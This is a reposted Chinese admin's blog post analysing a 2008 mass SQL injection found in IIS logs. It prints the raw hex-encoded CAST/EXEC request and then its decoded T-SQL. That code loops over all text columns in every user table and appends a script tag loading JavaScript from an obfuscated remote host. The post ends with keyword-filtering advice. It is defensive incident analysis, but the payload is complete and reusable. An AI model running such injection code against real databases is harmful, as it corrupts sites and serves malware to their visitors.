最近流行的sql注入攻击例子

（转载）服务器被注入攻击了， 每个文本字段都加上了 </title><script src=http://%6b%6b%36%2e%75%73/1.js></script> ，
经过分析IIS日志，（查询 exec 这样的关键词)，定位到了攻击者的足迹。如下：

2008-05-30 04:31:20 W3SVC8250132130 203.x.x.x GET /user.aspx userid=reecan;dEcLaRe%20@s%20vArChAr(4000);sEt%20@s=cAsT(0x6445634c615265204074207641724368417228323535292c406320764172436841722832353529206445634c615265207441624c655f637572736f5220635572536f5220466f522073456c45635420612e6e416d452c622e6e416d452046724f6d207359734f624a6543745320612c735973436f4c754d6e53206220774865526520612e69443d622e694420416e4420612e78547950653d27752720416e442028622e78547950653d3939206f5220622e78547950653d3335206f5220622e78547950653d323331206f5220622e78547950653d31363729206f50654e207441624c655f637572736f52206645744368206e6578742046724f6d207441624c655f637572736f5220694e744f2040742c4063207768696c6528404066457443685f7374617475733d302920624567496e20657865632827557044615465205b272b40742b275d20734574205b272b40632b275d3d727472696d28636f6e7665727428764172436841722c5b272b40632b275d29292b27273c2f7469746c653e3c736372697074207372633d687474703a2f2f2536622536622533362532652537352537332f312e6a733e3c2f7363726970743e27272729206645744368206e6578742046724f6d207441624c655f637572736f5220694e744f2040742c406320654e6420634c6f5365207441624c655f637572736f52206445416c4c6f43615465207441624c655f637572736f520d0a%20aS%20vArChAr(4000));exec(@s);-- 80 - 202.165.185.210 Mozilla/4.0 200 0 64

看到了吗，里面有个 cAsT (就是cast) ,后面还有exec(@s)
由于这里面记录的是URL编码格式，为了便于观察，进行URL解码，解码后的代码如下：
2008-05-30 04:31:20 W3SVC8250132130 203.x.x.x get /user.aspx userid=reecan;declare @s varchar(4000);set @s=cast(0x6445634c615265204074207641724368417228323535292c406320764172436841722832353529206445634c615265207441624c655f637572736f5220635572536f5220466f522073456c45635420612e6e416d452c622e6e416d452046724f6d207359734f624a6543745320612c735973436f4c754d6e53206220774865526520612e69443d622e694420416e4420612e78547950653d27752720416e442028622e78547950653d3939206f5220622e78547950653d3335206f5220622e78547950653d323331206f5220622e78547950653d31363729206f50654e207441624c655f637572736f52206645744368206e6578742046724f6d207441624c655f637572736f5220694e744f2040742c4063207768696c6528404066457443685f7374617475733d302920624567496e20657865632827557044615465205b272b40742b275d20734574205b272b40632b275d3d727472696d28636f6e7665727428764172436841722c5b272b40632b275d29292b27273c2f7469746c653e3c736372697074207372633d687474703a2f2f2536622536622533362532652537352537332f312e6a733e3c2f7363726970743e27272729206645744368206e6578742046724f6d207441624c655f637572736f5220694e744f2040742c406320654e6420634c6f5365207441624c655f637572736f52206445416c4c6f43615465207441624c655f637572736f520d0a as varchar(4000));exec(@s);-- 80 - 202.165.185.210 mozilla/4.0 200 0 64

这里面没有Update, 也看不出啥，关键是注入攻击者使用了 cast 这个SQL Server 内置函数，我们把cast（xx）里面的内容揭开看看。
结果是：dEcLaRe @t vArChAr(255),@c vArChAr(255) dEcLaRe tAbLe_cursoR cUrSoR FoR sElEcT a.nAmE,b.nAmE FrOm sYsObJeCtS a,sYsCoLuMnS b wHeRe a.iD=b.iD AnD a.xTyPe='u' AnD (b.xTyPe=99 oR b.xTyPe=35 oR b.xTyPe=231 oR b.xTyPe=167) oPeN tAbLe_cursoR fEtCh next FrOm tAbLe_cursoR iNtO @t,@c while(@@fEtCh_status=0) bEgIn exec('UpDaTe ['+@t+'] sEt ['+@c+']=rtrim(convert(vArChAr,['+@c+']))+''</title><script src=http://%6b%6b%36%2e%75%73/1.js></script>''') fEtCh next FrOm tAbLe_cursoR iNtO @t,@c eNd cLoSe tAbLe_cursoR dEAlLoCaTe tAbLe_cursoR
换成全小写
declare @t varchar(255),@c varchar(255) declare table_cursor cursor for select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) open table_cursor fetch next from table_cursor into @t,@c while(@@fetch_status=0) begin exec('update ['+@t+'] set ['+@c+']=rtrim(convert(varchar,['+@c+']))+''</title><script src=http://%6b%6b%36%2e%75%73/1.js></script>''') fetch next from table_cursor into @t,@c end close table_cursor deallocate table_cursor

看到了，阴险的注入代码都看到了。

-----------------------------
各个网络管理员吸取我的教训吧，防止注入攻击当然用存储过程最好，如果图省事，直接用SQL语句来传递参数，也一定要做好关键词过滤，除了网上经常讲到的过滤 ' ; -- , update, insert, delete,drop 等等，还要千万加上 exec 和 cast 这两个关键词。